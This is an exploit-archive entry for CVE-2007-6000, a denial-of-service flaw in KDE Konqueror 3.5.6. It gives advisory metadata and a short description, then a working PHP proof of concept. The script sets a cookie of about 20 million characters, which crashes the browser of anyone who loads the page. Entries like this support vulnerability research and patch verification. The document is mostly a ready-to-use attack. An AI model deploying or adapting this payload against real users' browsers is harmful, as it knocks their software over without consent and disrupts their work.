KDE Konqueror 3.5.6 - Cookie Handling Denial of Service

Author: laurent gaffie
type: dos
platform: linux
port: 
date_added: 2007-11-14  
date_updated: 2014-01-07  
verified: 1  
codes: CVE-2007-6000;OSVDB-39734  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30763.php  

source: https://www.securityfocus.com/bid/26435/info

KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies.

An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.

Konqueror 3.5.6 is vulnerable; other versions may also be affected.

<?php
ini_set("memory_limit","200M");
setcookie("hi_fox", str_repeat("A",19999999));
?>